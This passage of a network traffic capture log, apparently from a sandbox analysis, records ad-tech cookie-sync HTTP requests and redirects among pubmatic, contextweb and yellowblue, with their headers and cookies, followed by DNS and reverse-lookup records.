AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID HTTP/2.0
host: image8.pubmatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

content-type: text/html; charset=utf-8
location: /AdServer/ImgSync?p=159706&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID&rdf=1
set-cookie: KTPCACOOKIE=YES; domain=pubmatic.com; path=/; max-age=86400; secure;
date: Sun, 26 May 2024 02:06:58 GMT
content-length: 1689
GET

https://image8.pubmatic.com/AdServer/ImgSync?p=159706&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID&rdf=1

Request

GET /AdServer/ImgSync?p=159706&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID&rdf=1 HTTP/2.0
host: image8.pubmatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:58 GMT
content-length: 0
GET

https://bh.contextweb.com/bh/rtset?pid=562615&ev=1&us_privacy=[US_PRIVACY]&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&rurl=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11592%26uid%3D%25%25VGUID%25%25

Request

GET /bh/rtset?pid=562615&ev=1&us_privacy=[US_PRIVACY]&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&rurl=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11592%26uid%3D%25%25VGUID%25%25 HTTP/2.0
host: bh.contextweb.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

p3p: policyref="/bh/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Bitness,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version
cw-server: bh-deployment-stage-0
cache-control: private, max-age=0, no-cache, no-store
expires: -1
content-language: en-US
set-cookie: VP=part_GW6zDTtNSgsm;Version=0;Path=/;Domain=.contextweb.com;Max-Age=31104000;Secure;Expires=Wed, 21-May-2025 02:06:57 GMT;SameSite=None;Partitioned
set-cookie: pb_rtb_ev_part=3-1rkl|8i8.0.1;Version=0;Path=/;Domain=.contextweb.com;Max-Age=31536000;Secure;Expires=Mon, 26-May-2025 02:06:57 GMT;SameSite=None;Partitioned
set-cookie: pb_rtb_ev=3-1rkl|8i8.0.1;Version=0;Secure;Path=/;Domain=.contextweb.com;Expires=Mon, 26-May-2025 02:06:57 GMT;Max-Age=31536000;SameSite=None
set-cookie: V=GW6zDTtNSgsm;Version=0;Secure;Path=/;Domain=.contextweb.com;Expires=Wed, 21-May-2025 02:06:57 GMT;Max-Age=31104000;SameSite=None
set-cookie: gdpr=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA;Version=0;Secure;Path=/;Domain=.contextweb.com;Expires=Tue, 25-Jun-2024 02:06:57 GMT;Max-Age=2592000;SameSite=None
location: https://cs.yellowblue.io/cs?aid=11592&uid=GW6zDTtNSgsm&ev=1&us_privacy=[US_PRIVACY]&pid=562615&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1
server: Jetty(10.0.14)
set-cookie: INGRESSCOOKIE=7f40be558b84bf24; path=/; HttpOnly; Secure; SameSite=None
DNS

am1-direct-bgp.contextweb.com

Request

am1-direct-bgp.contextweb.com

IN A

Response

am1-direct-bgp.contextweb.com

IN A

208.93.169.131
DNS

sync.1rx.io

Request

sync.1rx.io

IN A

Response

sync.1rx.io

IN A

46.228.174.117
DNS

match-eu-central-1-ecs.sharethrough.com

Request

match-eu-central-1-ecs.sharethrough.com

IN AAAA

Response
DNS

cs.yellowblue.io

Request

cs.yellowblue.io

IN A

Response

cs.yellowblue.io

IN A

52.18.156.159

cs.yellowblue.io

IN A

54.170.105.17

cs.yellowblue.io

IN A

54.217.173.39
DNS

am1-direct-bgp.contextweb.com

Request

am1-direct-bgp.contextweb.com

IN AAAA

Response
DNS

eu-west-dual.ads.stickyadstv.com.akadns.net

Request

eu-west-dual.ads.stickyadstv.com.akadns.net

IN A

Response

eu-west-dual.ads.stickyadstv.com.akadns.net

IN A

154.57.158.116

eu-west-dual.ads.stickyadstv.com.akadns.net

IN A

154.57.158.115
DNS

sync.1rx.io

Request

sync.1rx.io

IN AAAA

Response
DNS

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

Request

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

Response

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

52.215.88.52

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

52.18.191.35

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

34.241.181.187

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

54.155.222.129

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

18.203.54.214

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

52.211.107.53

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

52.19.106.158

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN A

54.77.16.249
DNS

eu-west-dual.ads.stickyadstv.com.akadns.net

Request

eu-west-dual.ads.stickyadstv.com.akadns.net

IN AAAA

Response

eu-west-dual.ads.stickyadstv.com.akadns.net

IN AAAA

2607:ae80:192:1::177

eu-west-dual.ads.stickyadstv.com.akadns.net

IN AAAA

2607:ae80:192:1::176
DNS

onetag-sys.com

Request

onetag-sys.com

IN A

Response

onetag-sys.com

IN A

51.75.86.98

onetag-sys.com

IN A

51.38.120.206

onetag-sys.com

IN A

51.89.9.254

onetag-sys.com

IN A

51.89.9.251

onetag-sys.com

IN A

51.89.9.252

onetag-sys.com

IN A

51.89.9.253
DNS

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

Request

blackbird-prd-ew1-alb-87915139.eu-west-1.elb.amazonaws.com

IN AAAA

Response
DNS

onetag-sys.com

Request

onetag-sys.com

IN AAAA

Response
DNS

e8960.e2.akamaiedge.net

Request

e8960.e2.akamaiedge.net

IN A

Response

e8960.e2.akamaiedge.net

IN A

104.68.78.171
DNS

cs.yellowblue.io

Request

cs.yellowblue.io

IN A

Response

cs.yellowblue.io

IN A

52.18.156.159

cs.yellowblue.io

IN A

54.170.105.17

cs.yellowblue.io

IN A

54.217.173.39
DNS

e8960.e2.akamaiedge.net

Request

e8960.e2.akamaiedge.net

IN AAAA

Response
DNS

cs.yellowblue.io

Request

cs.yellowblue.io

IN AAAA

Response
DNS

eus.rubiconproject.com

Request

eus.rubiconproject.com

IN A

Response

eus.rubiconproject.com

IN CNAME

eus.rubiconproject.com.edgekey.net

eus.rubiconproject.com.edgekey.net

IN CNAME

e8960.b.akamaiedge.net

e8960.b.akamaiedge.net

IN A

23.55.98.169
DNS

63.244.214.35.in-addr.arpa

Request

63.244.214.35.in-addr.arpa

IN PTR

Response

63.244.214.35.in-addr.arpa

IN PTR

6324421435bcgoogleusercontentcom
DNS

135.211.48.52.in-addr.arpa

Request

135.211.48.52.in-addr.arpa

IN PTR

Response

135.211.48.52.in-addr.arpa

IN PTR

ec2-52-48-211-135 eu-west-1compute amazonawscom
DNS

251.9.89.51.in-addr.arpa

Request

251.9.89.51.in-addr.arpa

IN PTR

Response

251.9.89.51.in-addr.arpa

IN PTR

ip251 ip-51-89-9eu
DNS

